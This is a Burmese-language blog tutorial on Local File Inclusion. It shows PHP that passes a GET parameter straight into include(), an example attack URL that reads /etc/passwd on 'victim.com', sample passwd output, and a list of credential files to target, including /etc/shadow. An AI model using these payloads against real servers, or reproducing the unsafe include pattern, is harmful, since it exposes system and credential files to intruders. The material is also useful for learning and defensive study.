သိသေလာက္ေလးေရးထားတာပါ အမွားပါရင္လည္း ၀င္ေရာက္ေဆြးေႏြးနိုင္ပါတယ္
LFI ဆိုတာ ဘာလဲ?
run_time ေပၚက local files မွာပါ၀င္တဲ႔ server/script လုပ္တဲ႔နည္းလမ္းတစ္ခုပါ
procedure လိုေခၚတဲ႔ ရွုပ္ေထြးလွတဲ႔ systems ေတြကို order လုပ္ခိုင္းတဲ႔နည္းလမ္းတစ္ခုလည္းျဖစ္ပါတယ္
အခ်ိဳ႕ website ေတြက အဲလိုမ်ိဳးျဖစ္တတ္ပါတယ္ ဘာေၾကာင္႔ျဖစ္ရလဲဆိုေတာ႔
web developer ေတြက pages မွာေရးထားတဲ႔ GET requests ကို အသံုးျပဳတဲ႔အတြက္ေၾကာင္႔ပါ $_GET['page'] ဂလို႔ေတြေပါ႔
တစ္ခ်ိဳ႕က id နဲ႔ ေခၚျပီး တစ္ခ်ိဳ႕ webdeveloper ေတြက page ေတြနဲ႔ေခၚပါတယ္ ကၽြန္ေတာ္ကေတာ႔ ေသခ်ာမစမ္းသပ္ရေသးေပ႔မယ္႔ id သံုးတာကိုပိုၾကိဳက္ပါတယ္
id သံုးတာလည္း coding error တက္ရင္ sql vul ျဖစ္ပါတယ္
vul for lfi
<?php
$page = $_GET[page];
include($page);
?>
---------
$page = $_GET[page];
require_once($page);
?>
ဆိုပါစို႔ ဒီလိုမ်ိဳးဆိုက္တစ္ခု
http://www.victim.com/exploit/do.php?not=exist.php&for=real
ဆိုတဲ႔ variable နွစ္ခုလည္းရွိပါတယ္ ဆက္ေလ႔လာရေအာင္ စိတ္၀င္စားရင္ေပါ႔ ဟီး
not variable မွာက exist.php ရဲ႕ တန္ဖိုးေတြပါ၀င္ပါတယ္ for variable မွာက real ေပါ႔
not variable က argument အျဖစ္နဲ႔ အျခား php file ကိုလုပ္ေဆာင္မယ္လို႔ထင္ရပါတယ္
inclusion ေပါ႔ local file ထဲကို web brower ကေန က်ဴးေက်ာ္၀င္ေရာက္ျခင္းလို႔ အဓိပါယ္ရပါတယ္
ဒီေလာက္ဆုိရင္ LFI စလို႔ရပါျပီ
ကဲ႔ ကၽြန္ေတာ္တုိ႔ LFI သံုးျပီး URL ကို လက္ကျမင္းေက်ာထရေအာင္
ပထမဆံုး not variable ကို "/etc/passwd" ျဖစ္ေအာင္ေျပာင္းျပီး ၾကည္႔ရေအာင္ဘာေတြေတြ႔လဲဆိုတာ
တစ္ကယ္ေတာ႔ /etc/passwd ကိုအျခား သင္႔စိတ္ၾကိဳက္ေျပာင္းလဲျပီး စမ္းသပ္နိုင္ပါတယ္
ကၽြန္ေတာ္ကေတာ႔ရိုးရိုးေလးျဖစ္တဲ႔ etc/passwd ကိုပဲ႔သံုးျပထားပါတယ္
http://www.victim.com/exploit/do.php?not=/etc/passwd&for=real
output ေလးတစ္ခ်က္ၾကည္႔ရေအာင္ဗ်ာအကယ္ရွ္ဒီလိုမ်ိဳးသာထြက္လာရင္ သို႔ ဒီလိုပံုစံ မ်ိဳးနဲ႔ လာတယ္ဆိုရင္ေတာ႔
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
သင္႔က LFI vulnerability ရွိတဲ႔ site ကိုရွာေတြ႔႔ပါျပီအသံုး၀င္တဲ႔ code
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
etc/passwd ဆိုတာက *NIX system ေပၚက world_readable ဖိုင္ပါ
ေနာက္ထပ္ ခန္႔မွန္းခ်က္ေတြနဲ႔ ၾကိဳးစားၾကည္႔ရေအာင္
Should i continue my tutorial?... How to attack with this method
need feedback from member.
Thanks by cyberoot1@gmail.com
No comments:
Post a Comment
Thanks for your comments
Welcome from cyberoot